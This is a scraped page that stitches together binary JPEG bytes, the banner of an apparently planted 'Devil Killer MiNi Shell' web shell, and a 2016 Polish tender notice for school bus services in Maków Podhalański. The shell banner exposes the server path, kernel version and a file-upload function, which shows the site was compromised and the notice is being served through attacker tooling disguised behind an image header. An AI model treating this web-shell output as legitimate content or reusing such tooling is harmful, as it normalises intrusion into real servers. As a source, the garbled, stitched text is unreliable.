JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160719/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160719/143487-N-2016.html

<p class="kh_header"><b>Maków Podhalański: Zakup biletów miesięcznych dla uczniów dojeżdżających do szkół podstawowych i gimnazjów Gminy Maków Podhalański w roku szkolnym 2016/2017 oraz dowóz uczniów na basen w Suchej Beskidzkiej, w ramach zajęć lekcji wychowania fizycznego.</b><br>
<b>Numer ogłoszenia: 143487 - 2016; data zamieszczenia: 19.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Zarząd Placówek Oświatowych , ul. Szpitalna 3, 34-220 Maków Podhalański, woj. małopolskie, tel. 33 8749755, faks 33 8749753.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.makow-podhalanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup biletów miesięcznych dla uczniów dojeżdżających do szkół podstawowych i gimnazjów Gminy Maków Podhalański w roku szkolnym 2016/2017 oraz dowóz uczniów na basen w Suchej Beskidzkiej, w ramach zajęć lekcji wychowania fizycznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Zakup biletów miesięcznych, w oparciu a Art. 5a ustawy z dnia 20 czerwca 1992 r. o uprawnieniach do ulgowych przejazdów środkami transportu publicznego zbiorowego (Dz. U. z 2012 r. poz. 1138 z późn. zm.) na przewóz uczniów do szkół podstawowych i gimnazjalnych na terenie Gminy Maków Podhalański oraz dowóz uczniów na basen w Suchej Beskidzkiej w ramach zajęć lekcji wychowania fizycznego.
Zakres zamówienia obejmuje:
Zadanie I: Dowóz uczniów do szkół podstawowych i gimnazjalnych na terenie Gminy Maków Podhalański w roku szkolnym 2016/2017, poprzez zakup biletów miesięcznych w transporcie regularnym.
Zadanie II: Dowóz uczniów na basen w Suchej Beskidzkiej w ramach zajęć lekcji wychowania fizycznego.
AD. Zadania I. Okres świadczenia usług: od dnia 01.09.2016 r., do dnia 30.06.2017 r. Dowóz odbywać będzie się codziennie od poniedziałku do piątku za wyjątkiem dni wolnych od nauki.
Dowóz obejmuje trasy:
Do Zespołu Szkół w Makowie Podhalańskim: 
przywóz uczniów do szkoły na godz. 7:50 - rozpoczęcie lekcji 8:00
Trasa I: Maków Dolny - Maków Szkoła - odjazd z przystanku 7:40
             3 km x 2 = 6 km 
            13 uczniów 
Godzina odjazdu po zakończonych zajęciach: od poniedziałku do piątku 14:30
Trasa II: Osiedle Jurki przez Makowską Górę - Maków  Szkoła - odjazd z przystanku 7:20
               5 km x 2 =10 km 
               21 uczniów   
Os. Jurki - 2  uczniów
Os. Bryndze - 9 uczniów 
Os. Koziany -  1 uczeń 
Os. Makowska Góra - 9 uczniów 
Godzina odjazdu po zakończonych zajęciach: od poniedziałku do piątku 14:30
ZAMAWIAJĄCY ZASTRZEGA: że w okresie zimowym ze względu na złe warunki atmosferyczne kurs na trasie Makowska Góra - Osiedle Jurki może zostać zawieszony.
Trasa III: Żarnówka Sobaniaki - Maków Szkoła - odjazd z przystanku 7:35 
               4 km x 2 = 8 km 
               6 uczniów 
Żarnówka Sobaniaki - 6 uczniów - odjazd z przystanku 7:35
Godzina odjazdu po zakończonych zajęciach: od poniedziałku do piątku 14:30
     Do Zespołu Szkół w Białce: 
     przywóz uczniów do szkoły na godz. 7:30 - rozpoczęcie lekcji 7:35 
Trasa IV: Żarnówka Biblioteka - Szkoła Białka - odjazd z przystanku 7:00
                    9 km x 2 = 18 km 
                   18 uczniów w tym: 
Żarnówka Biblioteka - 7 uczniów
Żarnówka Kościół - 5 uczniów
Żarnówka OSP - 6 uczniów
         Godzina odjazdu po zakończonych zajęciach: od poniedziałku do piątku 14:05
Trasa V: Żarnówka Pętla - Szkoła Białka - odjazd z przystanku 6:55
                   13 km x 2 = 26 km 
                   28 uczniów w tym:
Żarnówka Pętla - 10 uczniów	
Żarnówka Potoki - 3 uczniów
Wieprzec OSP - 11 uczniów
Wieprzec Brzany - 2 uczniów          	
Kojszówka Pustki - 2 uczeń
Godzina odjazdu po zakończonych zajęciach: od poniedziałku do piątku 14:05
Trasa VI: Białka u Gronia - Szkoła Białka - odjazd z przystanku 7:20
                    3 km x 2 = 6 km 
                   7 uczniów w tym: 
Białka u Gronia - 3 uczniów
Białka Marszałkowa - 2 uczniów
Białka Górna - 2 uczniów
Godzina odjazdu po zakończonych zajęciach: od poniedziałku do piątku 14:05
     Do Zespołu Szkół w Grzechyni: 
     przywóz uczniów do szkoły godz. 8:20 - rozpoczęcie lekcji 8:30
Trasa VII: Grzechynia Drwalówka - Grzechynia Szkoła - odjazd z przystanku 8:10
                   3 km x 2 = 6 km
                   4 uczniów 
Grzechynia Drwalówka - Polana - 4 uczniów
Godzina odjazdu po zakończonych zajęciach 13:00
Trasa VIII: Grzechynia Polana - Grzechynia Szkoła - odjazd z przystanku 8:15
                   3,5 km x 2 = 7 km
                   7 uczniów 
Grzechynia Drwalówka - Polana - 7 uczniów
Godzina odjazdu po zakończonych zajęciach 1450		
    Do Zespołu Szkół w Juszczynie:
    przywóz uczniów do szkoły na godz. 7:45 - rozpoczęcie lekcji godz. 8:00
   Trasa IX: Kojszówka Pętla - Juszczyn Szkoła - odjazd z przystanku 7:30
              4,2 km x 2 = 8,4 km 
              10 uczniów w tym:
Kojszówka Pętla - 3 uczniów
Kojszówka Remiza - 5 uczniów               
Kojszówka Dolne Zagrody - 2 uczeń
Godzina odjazdu po zakończonych zajęciach: 13:10, 15:05  (odwóz połączony Juszczyn Zgudy - Kojszówka) 
   Trasa X: Juszczyn Przysłop - Juszczyn Szkoła 
                    7,1 km x 2 = 14,2 km 
                   27 uczniów  
Semestr  I  tj. od 01.09.2016 r. do 27.01.2017 r. - I zmiana odjazd z przystanku godz.7:10
Juszczyn Przysłop - 10 uczniów  
Juszczyn Polany - 11 uczniów 
Juszczyn Huta - 5 uczniów  
Juszczyn Cadyń Górna - 1 uczniów 
         Godzina odjazdu po zakończonych zajęciach: 13:10, 15:05
Semestr  I   tj. od 01.09.2016 r. do 27.01.2017 r. - II zmiana odjazd z przystanku godz. 9:50
               8 uczniów 
Juszczyn Przysłop - 1 uczniów
Juszczyn Polany - 2 uczniów
Juszczyn Cadyń Górna - 5 uczniów
Godzina odjazdu po zakończonych zajęciach: 15:05
Semestr  II  tj. od 13.02.2017 r. do 30.06.2017 r. - I zmiana odjazd z przystanku godz. 7:10
               25 uczniów 
Juszczyn Przysłop - 8 uczniów                 
Juszczyn Polany - 9 uczniów 
Juszczyn Huta - 3 uczniów  
Juszczyn  Cadyń Górna - 5 uczniów 
Godzina odjazdu po zakończonych zajęciach: 13:10, 15:05
     Semestr II  tj. od 13.02.2017 r. do 30.06.2017 r. - II zmiana odjazd z przystanku godz. 9:50  
                    10 uczniów 
Juszczyn Przysłop - 3 uczniów
Juszczyn Polany - 4 uczniów              
Juszczyn Huta - 2 uczniów
Juszczyn  Cadyń Górna - 1 uczeń 
Godzina odjazdu po zakończonych zajęciach: 15:05 
   Trasa XI: Juszczyn Zgudy - Juszczyn Szkoła 
                  3 km  x 2 = 6 km   
     Semestr  I  tj. od 01.09.2016 r. do 27.01.2017 r. - I zmiana odjazd z przystanku godz. 7:35
              12 uczniów 
Godzina odjazdu po zakończonych zajęciach: 13:10, 15:05 (odwóz połączony z Juszczyn Zgudy - Kojszówka) 
    Semestr  I  tj. od 01.09.2016 r. do 27.01.2017 r. - II zmiana odjazd z przystanku godz. 10:20
             12 uczniów  
Godzina odjazdu po zakończonych zajęciach: 15:05 (odjazd połączony Juszczyn Zgudy - Kojszówka).
    Semestr  II  tj. od 13.02.2017 r. do 30.06.2017 r. - I zmiana odjazd z przystanku godz. 7:35
              5 uczniów
Godzina odjazdu po zakończonych zajęciach: 13:10, 15:05 (odjazd połączony Juszczyn Zgudy - Kojszówka) 
   Semestr  II  tj. od 13.02.2017 r. do 30.06.2017 r. - II zmiana odjazd z przystanku godz. 10:20
              5 uczniów 
Godzina odjazdu po zakończonych zajęciach: 15:05 (odjazd połączony Juszczyn Zgudy - Kojszówka) 
     Do Szkoły Podstawowej w Żarnówce: 
     przywóz uczniów do szkoły na godz. 8:15 - rozpoczęcie lekcji godz. 8:20
   Trasa XII:  Żarnówka OSP - Żarnówka Szkoła - odjazd z przystanku godz. 8:00   
                3,5 km x 2 = 7,0 km  (autobus nr 1)
           38 uczniów (klasa 0 - III)  
Żarnówka OSP - 10 uczniów
Żarnówka Kościół - 15 uczniów
Żarnówka Biblioteka - 13 uczniów
Godzina odjazdu po zakończonych zajęciach: 13:30   3x w tygodniu  
                                                                                   14:10   2x w tygodniu
Dwa razy w tygodniu liczba uczniów w autobusie wynosić będzie 47:
Żarnówka OSP - 12 uczniów
Żarnówka Kościół - 16 uczniów
Żarnówka Biblioteka - 19 uczniów
   Trasa XIII: Żarnówka OSP - Żarnówka Szkoła - odjazd z przystanku godz. 8:00
                3,5 km x 2 = 7 km   (autobus nr 2) 
           23 uczniów (klasa IV - VI ) 
Żarnówka OSP - 4 uczniów
Żarnówka Kościół - 6 uczniów
Żarnówka Biblioteka - 13 uczniów
Godzina odjazdu po zakończonych zajęciach: 15:05  
  Dwa razy w tygodniu liczba uczniów w autobusie wynosić będzie 14:
Żarnówka OSP - 2 uczniów
Żarnówka Kościół - 5 uczniów
Żarnówka Biblioteka - 7 uczniów
W przypadku odpracowywania zajęć szkolnych w innym dniu wolnym od zajęć Wykonawca zadania zobowiązany jest zapewnić przewóz uczniów po uzgodnieniu z Dyrektorem Szkoły.
W ramach usług transportowych Wykonawca ma zapewnić na wszystkich trasach Opiekuna uczniom.
Zmiany wynikające z organizacji roku szkolnego będą wprowadzane aneksem do umowy z Wykonawcą.
Ad. Zadania II:
Dowóz obejmuje trasy:
Trasa I: Zespół Szkół Grzechynia - Zespół Szkół Maków Podhalański - basen Sucha Beskidzka
            10,4 km x 2 = 20,8 km
Poniedziałek: wyjazd z Zespołu Szkół Grzechynia godz. 9:25     -  15 uczniów + 1 opiekun
                   przez Zespół Szkół Maków Podhalański godz. 9:40  -  30 uczniów + 2 opiekunów
Wyjazd z basenu w Suchej Beskidzkiej godz. 11:15
Trasa II: Zespół Szkół Białka - Zespół Szkół Juszczyn - Basen Sucha Beskidzka
            15 km x 2 = 30 km
Wtorek: wyjazd z Zespołu Szkół Juszczyn godz. 7:50    - 15 uczniów + 1 opiekun
            przez Zespół Szkół Białka godz. 8:00                        - 15 uczniów + 1 opiekun
Wyjazd z basenu w Suchej Beskidzkiej godz.9:45
W części dotyczącej dowozu uczniów na basen w Suchej Beskidzkiej w ramach zajęć lekcji wychowania fizycznego opiekę nad uczniami podczas dowozu zapewni Zamawiający.
Dzienna ilość kilometrów dowozu uczniów na basen w Suchej Beskidzkiej: 
Poniedziałek = 20,8 km
Wtorek = 30 km
Miesięczna ilość kilometrów dowozu uczniów na basen w Suchej Beskidzkiej: 
Wrzesień 2016 r. ( 4 pn. ; 4 wt.) = 203,2 km
Październik 2016 r. ( 5 pn. ; 4 wt. ) = 224,0 km
Listopad 2016 r. ( 4 pn. ; 4 wt. ) = 203,2 km
Grudzień 2016 r. ( 3 pn. ; 3 wt. ) = 152,4 km
Styczeń 2017 r. ( 4 pn. ; 4 wt. ) = 203,2 km
Luty 2017 r. ( 3 pn. ; 3 wt. ) = 152,4 km
Marzec 2017 r. ( 4 pn. ; 4 wt. ) = 203,2 km
Kwiecień 2017 r. ( 3 pn. ; 4 wt. ) = 182,4 km
Maj 2017 r. ( 4 pn. ; 5 wt. ) = 233,2 km
Czerwiec 2017 r. ( 4 pn. ; 4 wt. ) = 203,2km
Razem km = 1960,4 km ~1960 km
Zmiany wynikające z organizacji roku szkolnego będą wprowadzane aneksem do umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-8, 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w formie przewidzianej zgodnie z Art. 45 ust. 6 ustawy Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 z późn. zm.) Ustala się wadium dla całości przedmiotu zamówienia: w kwocie 8 000,00 złotych (słownie: osiem tysięcy złotych 00/100). Okres ważności wadium musi obejmować cały okres związania ofertą. Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego, przed upływem terminu składania ofert. Wadium wnoszone w formie: poręczeń bankowych, poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej oraz gwarancjach bankowych, gwarancjach ubezpieczeniowych oraz poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości - należy umieścić w oryginale wewnątrz koperty, w której złożono ofertę. Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego, przed upływem terminu składania ofert. Nr rachunku bankowego: Bank Spółdzielczy Jordanów oddział w Makowie Podhalańskim 39 8799 0001 0010 0100 0778 0009 Tytuł wpłaty: Wadium w postępowaniu o zamówienie publiczne nr GZPO.271.1.2.2016.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia spełnienia tego warunku Zamawiający wymaga od Wykonawców ubiegających się o udzielenie zamówienia: aktualny dokument potwierdzający, że Wykonawca prowadzi działalność w zakresie wykonywania usług objętych zamówieniem i posiada uprawnienia do ich wykonywania. Wykonawca wykaże, że posiada licencję na wykonywanie krajowego transportu drogowego lub zezwolenie na wykonywanie przewozów regularnych, wynikających z ustawy z dnia 6 września 2001 r., o transporcie drogowym (Dz. U. z 2013 r. poz. 1414), oraz oświadczenie o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 PZP (wg. zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia spełnienia tego warunku Zamawiający wymaga od Wykonawców ubiegających się o udzielenie zamówienia: wykaz zrealizowanych i wykonanych usług z należytą starannością. Wykonawca winien wykazać, że w ciągu ostatnich trzech lat, przed dniem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, usług z podaniem ich wartości, daty oraz miejsca wykonania, z załączeniem do oferty dokumentów potwierdzających, że usługi te zostały wykonane prawidłowo i z należytą starannością. Zamawiający wymagana trzech usług, polegające na przewozie osób w komunikacji regularnej dowozu uczniów do szkół przez okres, co najmniej 10 miesięcy i o wartości - nie mniejszej niż 250 000 złotych brutto każda (wg zał. nr 5 do SIWZ) oraz Wykonawca zaproponuje rozkład jazdy uwzględniający wszystkie godziny przywozu i odwozu uczniów do szkół. Zamawiający dopuszcza do 10 minut różnicy w zaproponowanych godzinach przywozu i odwozu uczniów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia spełnienia tego warunku Zamawiający wymaga od Wykonawców ubiegających się o udzielenie zamówienia: jest wykazanie Zamawiającemu przez Wykonawcę biorącemu udział w postępowaniu, posiadania czy to w formie własności, czy w formie leasingu lub też w formie użyczenia, na podstawie umowy cywilnoprawnej, co najmniej 3 autobusów o ogólnej liczbie miejsc min. 60,w tym co najmniej 39 miejsc siedzących, 1 autobusu o ogólnej liczbie miejsc min. 70. Autobusy ze względu na ukształtowanie terenu muszą mieć dopuszczalną masę całkowitą do 14000 kg. 1 autobus (typu BUS) o ilości miejsc siedzących min. 26 o dopuszczalnej masie całkowitej do 5500 kg. Wszystkie pojazdy muszą być w dobrym stanie technicznym, potwierdzone stosownymi przeglądami technicznymi, objęte ważnym ubezpieczeniem komunikacyjnym a ich rok produkcji 2005 lub młodszy (wg. zał. nr 6 do SIWZ). Pojazdy zgłoszone przez Wykonawcę do realizacji zamówienia mają być przystosowane do przewozu młodzieży szkolnej, spełniające wszystkie wymogi bezpieczeństwa i kodeksu ruchu drogowego. Wykonawca usługi ma obowiązek zapewnić odpowiednią liczbę miejsc siedzących do wymagań danej trasy, a w przypadku awarii środka transportu Wykonawca zapewni zastępczy środek transportu, w taki sposób aby nie powodować nadmiernego (ponad limit miejsc siedzących) zwiększenia liczby przewożonych uczniów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia spełnienia tego warunku Zamawiający wymaga od Wykonawców ubiegających się o udzielenie zamówienia: aby oprócz osób posiadających odpowiednie uprawnienia do kierowania pojazdami samochodowymi do przewozu osób, Wykonawca usługi zapewnił osobę pełniącą funkcję opiekuna podczas dowozu uczniów. Do zadań opiekuna należeć będzie w szczególności: zapewnienie bezpieczeństwa w trakcie przewozu uczniów do i ze szkoły, zapewnienie bezpiecznego wsiadania oraz wysiadania z pojazdu, nadzór w czasie przejścia z pojazdu samochodowego do i ze szkoły, opieki i zwracania uwagi na właściwe zachowanie się uczniów w pojeździe a w przypadku stwierdzenia sytuacji zagrażającej bezpieczeństwu uczniów w pojeździe, niedopuszczenie do ich przewozu. Oceny spełnienia tego warunków w tym zakresie Zamawiający dokona na podstawie oświadczenia złożonego przez Wykonawcę o spełnieniu warunków udziału w postępowaniu (wg zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia spełnienia tego warunku Zamawiający wymaga od Wykonawców ubiegających się o udzielenie zamówienia: złożenia przez Wykonawcę ubiegającego się o zamówienie, kopii opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Zamawiający wymaga przedstawienia dokumentu świadczącego o ubezpieczeniu od odpowiedzialności cywilnej, w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę co najmniej 500 000,00 złotych. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego, potwierdzające że Wykonawca nie zalega z opłacaniem podatków - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

